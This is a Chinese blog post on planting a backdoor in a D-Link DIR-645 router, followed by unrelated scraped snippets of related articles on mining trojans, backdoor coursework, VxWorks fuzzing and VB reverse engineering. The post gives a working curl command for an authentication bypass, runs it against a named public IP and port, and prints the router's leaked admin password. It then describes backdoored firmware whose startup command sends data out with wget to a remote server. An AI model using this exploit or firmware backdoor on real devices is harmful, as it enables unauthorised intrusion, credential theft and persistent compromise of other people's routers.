dir-645后门植入

# dir-645后门植入

dir-645有一个远程身份绕过的漏洞,可以post一些制定参数到路由器从而拿到密码

```

获取管理员密码:

curl -d SERVICES=DEVICE.ACCOUNT http://<device ip>/getcfg.php

```

目标路由的ip:213.182.235.167

目标路由的端口:1080

通过上面那个漏洞获取到管理员的账号密码

```

[email protected] ~> curl -d SERVICES=DEVICE.ACCOUNT http://213.182.235.167:1080/getcfg.php

<?xml version="1.0" encoding="utf-8"?>

<postxml>

<module>

<service>DEVICE.ACCOUNT</service>

<device>

<gw_name>DIR-645</gw_name>

<account>

<seqno>2</seqno>

<max>2</max>

<count>2</count>

<entry>

<uid>USR-</uid>

<name>admin</name>

<usrid></usrid>

<password>KU-820_FA(2015)</password>

<group>0</group>

<description></description>

</entry>

<entry>

<uid>USR-1</uid>

<name>user</name>

<usrid></usrid>

<password></password>

<group>101</group>

<description></description>

</entry>

</account>

<group>

<seqno></seqno>

<max></max>

<count>0</count>

</group>

<session>

<captcha>0</captcha>

<dummy></dummy>

<timeout>600</timeout>

<maxsession>128</maxsession>

<maxauthorized>16</maxauthorized>

</session>

</device>

</module>

</postxml>

[email protected] ~>

```

其中一栏显示了admin的账号密码

```

<entry>

<uid>USR-</uid>

<name>admin</name>

<usrid></usrid>

<password>KU-820_FA(2015)</password>

<group>0</group>

<description></description>

</entry>

```

使用得到的密码登录路由,提示登录成功

![](media/14709707067125/14709712454918.jpg)

下载了对应的路由器固件并且将固件解压出来之后,在固件的开机启动项中写入了一个获取系统内核的命令,并且使用路由器的wget命令传到一台远程服务器。

![](media/14709707067125/14712467312736.jpg)

之后将固件压缩成一个有后门的bin文件,使用路由器管理界面的固件上传将后门固件更新上去。(远程服务器已经在监听http访问日志) 等待上传完成之后就可以看到有日志记录了。可以看到test页面的test参数返回了路由器的内核信息,因为test.php这个页面是不存在的 所以是404.

![](media/14709707067125/14712468292430.png)

使用另外一个漏洞远程连接到路由器,在路由器内使用命令可以看到内核信息和返回的信息时一样的。证明后门植入成功

![](media/14709707067125/14712470642323.jpg)

以上仅是测试,测试完毕之后已经刷回官方固件。

时间: 2024-11-03 23:24:04

dir-645后门植入的相关文章

记一次window服务器木马排查(后门植入挖矿程序)

1,新项目需要一台windows服务器,安装所需环境和服务后,发现服务器资源不足无法运行,查看任务管理器,发现可疑程序占满了CPU 通过百度发现,这个一个挖矿程序,显然是被后门植入了矿机,果断杀掉进程,删掉文件 第二天,发现CPU又被挖矿沾满,经过分析,这个后门程序,和系统的svchost.exe很像,删除过后一直自动新建出来. 通过一个一个的排查进程,发现一个可疑进程,和程序,经过仔细的对比了解,可疑判断这是一个后门木马 由于服务器跑的服务比较多,不能开防火墙,只能选择第三方防护软件,综合对比

2018-2019-2 20165235《网络对抗技术》Exp2 后门原理与实践

2018-2019-2 20165235<网络对抗技术>Exp2 后门原理与实践 实验内容 1.使用netcat获取主机操作Shell,cron启动 2.使用socat获取主机操作Shell, 任务计划启动 3.使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell 4.使用MSF meterpreter(或其他软件)生成获取目标主机音频.摄像头.击键记录等内容,并尝试提权 基础问题 例举你能想到的一个后门进入到你系统中的可能

20154312 曾林 Exp4恶意软件分析

写在前面 如果把恶意软件比作罪犯的话,怎么看这次实验? 实验目的:以后能够在茫茫人海中找到罪犯. 实验过程:现在以及抓到了一个罪犯,把他放到茫茫人海里去,看看他和普通人有啥区别.这些区别就是罪犯的特征,以后可以根据这些特征找到更多的罪犯. 实验手段:利用各种技术去找到罪犯和普通人的区别. 回答问题 Q:如果在工作中怀疑一台主机上有恶意代码,但只是猜想,所有想监控下系统一天天的到底在干些什么.请设计下你想监控的操作有哪些,用什么方法来监控. A: 监控TCP连接 监控注册表修改情况 监控创建新的文

20145311王亦徐 《网络对抗技术》 MSF基础应用

20145311王亦徐 <网络对抗技术> MSF基础应用 实验内容 掌握metasploit的基本应用方式以及常用的三种攻击方式的思路 主动攻击,即对系统的攻击,不需要被攻击方配合,以ms08_067渗透为例 针对浏览器的攻击,以漏洞10_046为例 针对客户端的攻击,对具体应用的攻击,以对Adobe阅读器的漏洞攻击为例 最后是一个auxiliary模块的例子的应用 基础问题回答 1.解释exploit,payload,encode是什么 exploit是渗透攻击模块,利用系统服务应用中的漏洞

VxWorks Fuzzing 之道:VxWorks 工控实时操作系统漏洞挖掘调试与利用揭秘

转载:freebuf 0×00 前言 关于VxWorks,这里引用44CON议题<攻击 VxWorks:从石器时代到星际>探究 一文章中的介绍: VxWorks 是世界上使用最广泛的一种在嵌入式系统中部署的实时操作系统,是由美国WindRiver公司(简称风河公司,即WRS 公司)于1983年设计开发的.其市场范围跨越所有的安全关键领域,仅举几例,包括火星好奇心流浪者.波音787梦幻客机.网络路由器.这些应用程序的安全高危性质使得VxWorks的安全被高度关注. VxWorks操作系统是由美国

20145331魏澍琛《网络对抗》——免杀原理与实践

20145331魏澍琛<网络对抗>--免杀原理与实践 问题回答 1.杀软是如何检测出恶意代码的? 一个是基于特征码的检测,第二个是启发式恶意软件检测,最后是基于行为的恶意软件检测 2.免杀是做什么? 让病毒不被杀毒软件kill掉 3.免杀的基本方法有哪些? a)可以用这次实验所涉及的改变特征码 b)加壳:就是相当于把你的后门代码封装起来,但是现在大部分公开的壳都能被杀毒软件查出来,效果其实不好 实践过程 一.使用msf生成后门程序的检测 1.用上节课所讲的msf生成一个后门 2.到相应网站上查

Xcode简单介绍

背景介绍 编译器 下载安装 Xcode快捷键 背景介绍 Xcode 是运行在操作系统Mac OS X上的集成开发工具(IDE),由苹果公司开发.Xcode是开发OS X 和 iOS 应用程序的最快捷的方式.Xcode 具有统一的用户界面设计,编码.测试.调试都在一个简单的窗口内完成. Xcode运行于苹果公司的Mac操作系统下,是苹果公司向开发人员提供的集成开发环境(非开源),用于开发Mac OS X,iOS的应用程序.[3] 不管你用C.C++.Objective-C或Java编写程序,在Ap

[转载]VB程序逆向反汇编常见的函数

VB程序逆向常用的函数 1) 数据类型转换: a) __vbaI2Str    将一个字符串转为8 位(1个字节)的数值形式(范围在 0 至 255 之间) 或2 个字节的数值形式(范围在 -32,768 到 32,767 之间). b)__vbaI4Str   将一个字符串转为长整型(4个字节)的数值形式(范围从-2,147,483,6482,147,483,647) c)__vbar4Str  将一个字符串转为单精度单精度浮点型(4个字节)的数值形式 d)__vbar8Str   将一个字符

VB程序逆向常用的函数

本文转载!!! 原文地址:http://www.cnblogs.com/bbdxf/p/3780187.html 1) 数据类型转换: a) __vbaI2Str    将一个字符串转为8 位(1个字节)的数值形式(范围在 0 至 255 之间) 或2 个字节的数值形式(范围在 -32,768 到 32,767 之间). b)__vbaI4Str   将一个字符串转为长整型(4个字节)的数值形式(范围从-2,147,483,6482,147,483,647) c)__vbar4Str  将一个字